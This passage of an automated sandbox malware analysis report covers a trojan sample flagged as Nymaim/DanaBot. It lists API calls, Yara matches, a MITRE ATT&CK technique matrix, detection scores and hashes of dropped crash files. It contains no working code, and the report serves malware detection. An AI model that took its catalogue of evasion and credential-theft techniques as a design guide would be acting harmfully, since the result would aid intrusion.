Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00425CFB
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0042556F
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_00425E01
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,	0_2_00404620
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00425ED0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_0041CFF1
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,	0_2_00824887
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_00846068
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00846137
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_00845AC3
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_0083D258
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_00845A78
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00845BE9
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_00845B5E
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: EnumSystemLocalesW,	0_2_0083CD36
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,	0_2_00845E3C
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_008457D6
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00845F62

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_0040DFE3 cpuid

0_2_0040DFE3

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_00417043 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00417043

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_00405840 GetUserNameA,CreateThread,Sleep,Sleep,

0_2_00405840

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.820e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.qjrOWCCE58.exe.860000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.qjrOWCCE58.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.820e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269341375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.283327894.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.262759789.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253715249.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280137430.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253175312.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.302456596.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.291073585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.283828611.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.263480015.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284150109.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.301360286.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.302642354.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250452760.0000000000860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254142123.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292136739.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.301881203.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269598460.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.262441622.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.263212749.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309005504.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309602192.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309769483.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.291503648.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270183524.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292619266.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252534472.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269963050.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309168636.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	11 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	5 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	23 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qjrOWCCE58.exe	34%	Virustotal		Browse
qjrOWCCE58.exe	50%	ReversingLabs	Win32.Trojan.DanaBot
qjrOWCCE58.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	620693
Start date and time: 05/05/202205:39:04	2022-05-05 05:39:04 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	qjrOWCCE58 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.evad.winEXE@12/28@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 51.8% (good quality ratio 48.9%) Quality average: 77.1% Quality standard deviation: 28.4%
HCA Information:	Successful, ratio: 91% Number of executed functions: 12 Number of non-executed functions: 167
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 40.127.240.158, 23.205.181.161
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, login.live.com, go.microsoft.com.edgekey.net, sls.update.microsoft.com, settings-prod-neu-1.northeurope.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, atm-settingsfe-prod-geo.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_0c0c0928\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8772016254471042
Encrypted:	false
SSDEEP:	96:jKvwRjshloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBDIA:zIH56rwjxlk/u7sAS274It5E
MD5:	0216CA3E9CF45AFE94BDF4E6699D8541
SHA1:	A51A03BB633277DC82DC3F632BD7E6A50E6E5B22
SHA-256:	1DE57D9092695FC73A27B70217074D422AC9D791E60F4EA29C8DB4B3D6FA7576
SHA-512:	5B559DC0F0B1A7331653B5C3DB88C1ECD6A88AB721C79829CD2F57034F4AD1CD120BE7A79D1B91830228BA1FF26E73D982B284C81A495399FF41911BE80A7E12
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.1.8.8.6.5.2.1.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.2.d.f.8.d.0.-.b.3.1.6.-.4.7.9.4.-.8.b.d.0.-.4.2.6.a.e.4.e.1.2.8.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.f.6.4.a.a.1.-.0.8.1.e.-.4.e.e.7.-.9.8.a.5.-.8.f.e.d.6.0.a.8.3.3.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_10d822ca\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8774171114093317
Encrypted:	false
SSDEEP:	96:4XwR7shloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBDIiX:rAH56rwjxlk/u7sbS274It5E
MD5:	5908259C5D9F1A295C347370C64591A6
SHA1:	73888E8FF847D515DE63B6072ADF8300979C7608
SHA-256:	171CF4E9AC017B0646ED2860297784CB0FFEC643B2086D9B04B7862294C1CA07
SHA-512:	DE2377A1E4FDF3F7C682709870A15E8226F0D4CA585185BA39B324DCAE7236E42D0C53A33215083EB41806991C0CEA3D01D34346596D882D1F46921E2B6A45ED
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.2.5.6.0.8.6.5.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.8.c.1.7.a.f.-.c.4.8.8.-.4.b.d.5.-.a.0.1.2.-.d.2.8.6.d.3.f.8.3.0.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.9.5.2.3.d.8.-.c.5.a.2.-.4.6.9.5.-.a.6.c.8.-.e.e.a.d.d.6.b.2.8.0.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_1167fbca\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8635490173780485
Encrypted:	false
SSDEEP:	96:mYnV7wR/shloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBz:TykH56rwjxG/u7sAS274It5E
MD5:	BB701F9255E239DB0F27AEBC3EE53D43
SHA1:	C0013B523C5EAB7AE8A96E6167EBDA6A44FAC869
SHA-256:	A71EDC6B9168FD01EE055970FAE22F5592FF32CE62CC36F6BC42E64939DAFF90
SHA-512:	D8E9EDDEB2A917853F53D06DD7D1BA29F265000F4883DE1AF51086418C73A88AFF516B118D2CAA9B859C99E8B2DC0A17311AF099A08FB830EF8A5CBAA46DC26A
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.6.2.2.8.0.1.5.6.9.4.2.2.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.2.c.4.7.3.d.-.5.f.8.b.-.4.3.2.7.-.9.d.d.8.-.5.4.9.1.f.4.b.e.f.d.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.d.3.3.3.f.2.-.3.a.c.e.-.4.9.0.6.-.b.3.8.5.-.7.e.c.9.e.2.b.9.2.d.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.j.r.O.W.C.C.E.5.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.d.-.2.8.b.7.-.0.6.4.0.7.d.6.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.4.e.4.4.7.7.f.f.5.f.3.1.1.8.6.1.4.0.f.8.1.d.f.1.1.b.b.c.e.d.5.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.9.3.b.e.6.0.0.a.a.8.e.c.f.7.3.8.4.a.c.3.f.2.3.4.5.4.d.a.f.6.f.d.d.1.8.2.1.d.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.4././.0.6.:.2.1.:.1.3.:.4.2.!.0.!.q.j.r.O.W.C.C.E.5.8...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_qjrOWCCE58.exe_455362eeffb32f0bf40f06cd73c56872c5d9440_dba93c7d_12a3eeab\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8570740057313196
Encrypted:	false
SSDEEP:	96:iY+wRCshloA7RC6tpXIQcQnc6rCcEhcw3r7+HbHg/opAnQ0DFE8WpB72OyEmBDIM:BxH56rwjxy/u7sAS274It5E
MD5:	94FA62DE2DE6A2AF49D88BF565602D1B
SHA1:	A3DDD7742A08DEE39F5064A1EC80DB5DDCAAA07F
SHA-256:	6832FFEDEF3322E192569B7E264B8A4D8D4C1E01BA704C5D025835A1F75CBADB
SHA-512:	07ADC777F99603B2879772BED904624DF471BD48B7DB475D4EA8B921CAF3330FF6797FCFEDAE4A786EC2218F1D9EDAF3C5649373863BD3815B86D8C48465AE82
Malicious:	true
